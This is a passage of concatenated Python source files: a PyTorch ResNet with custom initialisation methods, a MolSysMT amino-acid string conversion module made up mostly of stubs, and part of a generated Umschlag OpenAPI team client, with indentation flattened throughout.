self.conv1 = conv1x1(in_planes, planes)
self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.conv2 = conv3x3(planes, planes, stride=stride) #, padding=1)
self.bn2 = nn.BatchNorm2d(planes)
# self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.conv3 = conv1x1(planes, self.expansion*planes)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
# def __init__(self, block, num_blocks, num_classes=10, init_method='standard'):
def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'):
super(ResNet, self).__init__()
self.in_planes = in_planes
# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.conv1 = conv3x3(3, self.in_planes, stride=1) #, padding=1)
self.bn1 = nn.BatchNorm2d(self.in_planes)
if self.in_planes == 64:
# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
#self.linear = layers.Linear(512*block.expansion, num_classes)
elif self.in_planes == 16:
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
self.layer4 = None
self.linear = nn.Linear(64, num_classes)
#self.linear = layers.Linear(64, num_classes)
self.reset_conv_parameters(init_method)
self.init_linear = torch.clone(self.linear.weight.data).detach()
        #self.init_conv_signs = [m.weight.data.sign() for m in self.modules() if isinstance(m, nn.Conv2d)]
def reset_linear(self) -> None:
self.linear.weight.data.copy_(self.init_linear)
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_bop_param_masks(self):
bop_param_masks = []
for m in self.modules():
if isinstance(m, layers.Conv2d):
bop_param_masks.append(m.weight_mask)
return bop_param_masks
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
if self.layer4 is not None:
out = self.layer4(out)
# out = F.avg_pool2d(out, 4)
out = F.avg_pool2d(out, out.size()[3])
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ResNet20(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method)
def ResNet110(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [18,18,18], in_planes=16, num_classes=num_classes, init_method=init_method)
def ResNet18(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method)
# def ResNet34(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
def ResNet34(num_classes=10, init_method='standard'):
return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method)
# def ResNet50(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
# return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes,
# init_method=init_method)
def ResNet50(num_classes=10, init_method='standard'):
return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)
# def ResNet101(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
# return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes,
# init_method=init_method)
def ResNet101(num_classes=10, init_method='standard'):
return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)
# def ResNet152(input_shape, num_classes, dense_classifier, pretrained, init_method='standard'):
# return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes,
# init_method=init_method)
def ResNet152(num_classes=10, init_method='standard'):
return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)
def test():
net = ResNet18()
y = net(torch.randn(1,3,32,32))
print(y.size())
# test()
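The `kaiming_constant_signed` and `kaiming_constant_unsigned` branches in `reset_parameters` both collapse the Kaiming distribution to a single magnitude: the ReLU gain `sqrt(2)` divided by `sqrt(fan_in)`. A standalone sketch of that computation (`kaiming_constant_std` is an illustrative helper, not part of the model code):

```python
import math

def kaiming_constant_std(fan_in: int) -> float:
    """Magnitude used by the kaiming_constant_* branches: gain / sqrt(fan)."""
    gain = math.sqrt(2.0)  # matches nn.init.calculate_gain("relu")
    return gain / math.sqrt(fan_in)

# fan_in for a 3x3 conv with 64 input channels: 64 * 3 * 3 = 576
print(round(kaiming_constant_std(576), 6))  # -> 0.058926
```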
# --- molsysmt/forms/strings/api_string_aminoacids1.py (uibcdf/MolSysMT, MIT) ---
from molsysmt.forms.common_gets import *
import numpy as np
from molsysmt.molecular_system import molecular_system_components
form_name='string:aminoacids1'
is_form={
'string:aminoacids1' : form_name,
}
info=["",""]
has = molecular_system_components.copy()
for ii in ['elements']:
has[ii]=True
### Corresponde al formato IUPAC extended protein que aparece en Biopython
def to_string_aminoacids3(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from Bio.SeqUtils import seq3
tmp_item=seq3(item)
if molecular_system is not None:
tmp_molecular_system=molecular_system.combine_with_items(tmp_item)
else:
tmp_molecular_system=None
return tmp_item, tmp_molecular_system
def to_biopython_Seq(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.forms.classes.api_biopython_Seq import extract as extract_biopython_Seq
from Bio.Seq import Seq as bio_Seq
    from Bio.Alphabet.IUPAC import ExtendedIUPACProtein  # note: Bio.Alphabet was removed in Biopython >= 1.78
tmp_item = bio_Seq(item, ExtendedIUPACProtein())
tmp_item = extract_biopython_Seq(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
else:
tmp_molecular_system = None
return tmp_item, tmp_molecular_system
def to_biopython_SeqRecord(item, molecular_system=None, atom_indices='all', frame_indices='all', id=None, name=None, description=None):
from molsysmt.forms.classes.api_biopython_Seq import to_biopython_SeqRecord as Seq_to_SeqRecord
tmp_item, tmp_molecular_system = to_biopython_Seq(item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = Seq_to_SeqRecord(tmp_item, molecular_system=tmp_molecular_system)
return tmp_item, tmp_molecular_system
def to_fasta(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None):
from molsysmt.forms.classes.api_biopython_SeqRecord import to_fasta as SeqRecord_to_fasta
tmp_item, tmp_molecular_system = to_biopython_SeqRecord(item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = SeqRecord_to_fasta(tmp_item, molecular_system=tmp_molecular_system, output_filename=output_filename)
return tmp_item, tmp_molecular_system
def to_pir(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None, id=None, style=None):
from molsysmt.forms.classes.api_biopython_SeqRecord import to_file_pir as SeqRecord_to_file_pir
tmp_item, tmp_molecular_system = to_biopython_SeqRecord(item, molecular_system=molecular_system, id=id, atom_indices=atom_indices, frame_indices=frame_indices)
    tmp_item, tmp_molecular_system = SeqRecord_to_file_pir(tmp_item, molecular_system=tmp_molecular_system, output_filename=output_filename, style=style)
return tmp_item, tmp_molecular_system
def to_string_aminoacids1(item, molecular_system=None, atom_indices='all', frame_indices='all', copy_if_all=True):
tmp_molecular_system = None
    if (atom_indices == 'all') and (frame_indices == 'all'):
if copy_if_all:
tmp_item = extract_item(item)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
else:
tmp_item = item
if molecular_system is not None:
tmp_molecular_system = molecular_system
else:
tmp_item = extract_item(item, atom_indices=atom_indices, frame_indices=frame_indices)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def extract_item(item, atom_indices='all', frame_indices='all'):
    if (atom_indices == 'all') and (frame_indices == 'all'):
raise NotImplementedError()
else:
raise NotImplementedError()
return tmp_item
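A note on the `'all'` sentinel used throughout this module: these guards should compare strings by value, since an identity check against a string literal depends on CPython interning details and is not guaranteed. A small illustration:

```python
sentinel = "all"
computed = "".join(["a", "ll"])  # same value, typically a distinct object

print(sentinel == computed)  # True: value equality is reliable
# `sentinel is computed` is an identity check and may well be False here,
# which is why `==` is the safe way to test for the 'all' sentinel.
```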
def add(item, from_item, atom_indices='all', frame_indices='all'):
raise NotImplementedError()
def append_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError()
###### Get
## atom
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_index_from_atom as _get
return _get(item, indices=indices)
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_index_from_atom as _get
return _get(item, indices=indices)
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_index_from_atom as _get
return _get(item, indices=indices)
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_frame_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
## group
def get_group_id_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_name_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_type_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
## component
def get_component_id_from_component (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_id_from_component as get
return get(item, indices)
def get_component_name_from_component (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_name_from_component as get
return get(item, indices)
def get_component_type_from_component (item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_component_type_from_component as get
return get(item, indices)
## molecule
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_id_from_molecule as get
return get(item, indices)
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_name_from_molecule as get
return get(item, indices)
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_molecule_type_from_molecule as get
return get(item, indices)
## chain
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
## entity
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_id_from_molecule as get
return get(item, indices)
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_name_from_molecule as get
return get(item, indices)
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_entity_type_from_molecule as get
return get(item, indices)
## system
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
return None
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
return len(item)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
from molsysmt.elements.component import get_n_components_from_system as get
return get(item, indices)
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
from molsysmt.elements.molecule import get_n_molecules_from_system as get
return get(item, indices)
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
from molsysmt.elements.entity import get_n_entities_from_system as get
return get(item, indices)
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_volume_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_time_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_step_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
## bond
def get_bond_order_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_bond_type_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_index_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
# --- umschlag/api/team_api.py (umschlag/umschlag-python, Apache-2.0) ---
"""
Umschlag OpenAPI
API definition for Umschlag # noqa: E501
The version of the OpenAPI document: 1.0.0-alpha1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from umschlag.api_client import ApiClient
from umschlag.exceptions import (
ApiTypeError,
ApiValueError
)
class TeamApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def append_team_to_user(self, team_id, team_user, **kwargs): # noqa: E501
"""Assign a user to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.append_team_to_user(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to assign (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.append_team_to_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
else:
(data) = self.append_team_to_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
return data
def append_team_to_user_with_http_info(self, team_id, team_user, **kwargs): # noqa: E501
"""Assign a user to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.append_team_to_user_with_http_info(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to assign (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team_user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method append_team_to_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `append_team_to_user`") # noqa: E501
# verify the required parameter 'team_user' is set
if ('team_user' not in local_var_params or
local_var_params['team_user'] is None):
raise ApiValueError("Missing the required parameter `team_user` when calling `append_team_to_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team_user' in local_var_params:
body_params = local_var_params['team_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_team(self, team, **kwargs): # noqa: E501
"""Create a new team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_team(team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Team team: The team data to create (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_team_with_http_info(team, **kwargs) # noqa: E501
else:
(data) = self.create_team_with_http_info(team, **kwargs) # noqa: E501
return data
def create_team_with_http_info(self, team, **kwargs): # noqa: E501
"""Create a new team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_team_with_http_info(team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Team team: The team data to create (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team' is set
if ('team' not in local_var_params or
local_var_params['team'] is None):
raise ApiValueError("Missing the required parameter `team` when calling `create_team`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team' in local_var_params:
body_params = local_var_params['team']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_team(self, team_id, **kwargs): # noqa: E501
"""Delete a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_team_with_http_info(team_id, **kwargs) # noqa: E501
else:
(data) = self.delete_team_with_http_info(team_id, **kwargs) # noqa: E501
return data
def delete_team_with_http_info(self, team_id, **kwargs): # noqa: E501
"""Delete a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team_with_http_info(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `delete_team`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_team_from_user(self, team_id, team_user, **kwargs): # noqa: E501
"""Remove a user from team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team_from_user(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to delete (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_team_from_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
else:
(data) = self.delete_team_from_user_with_http_info(team_id, team_user, **kwargs) # noqa: E501
return data
def delete_team_from_user_with_http_info(self, team_id, team_user, **kwargs): # noqa: E501
"""Remove a user from team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_team_from_user_with_http_info(team_id, team_user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param TeamUserParams team_user: The team user data to delete (required)
:return: GeneralError
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team_user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_team_from_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `delete_team_from_user`") # noqa: E501
# verify the required parameter 'team_user' is set
if ('team_user' not in local_var_params or
local_var_params['team_user'] is None):
raise ApiValueError("Missing the required parameter `team_user` when calling `delete_team_from_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team_user' in local_var_params:
body_params = local_var_params['team_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeneralError', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_team_users(self, team_id, **kwargs): # noqa: E501
"""Fetch all users assigned to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_team_users(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: list[TeamUser]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_team_users_with_http_info(team_id, **kwargs) # noqa: E501
else:
(data) = self.list_team_users_with_http_info(team_id, **kwargs) # noqa: E501
return data
def list_team_users_with_http_info(self, team_id, **kwargs): # noqa: E501
"""Fetch all users assigned to team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_team_users_with_http_info(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: list[TeamUser]
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_team_users" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `list_team_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamUser]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_teams(self, **kwargs): # noqa: E501
"""Fetch all available teams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_teams(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[Team]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_teams_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_teams_with_http_info(**kwargs) # noqa: E501
return data
def list_teams_with_http_info(self, **kwargs): # noqa: E501
"""Fetch all available teams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_teams_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[Team]
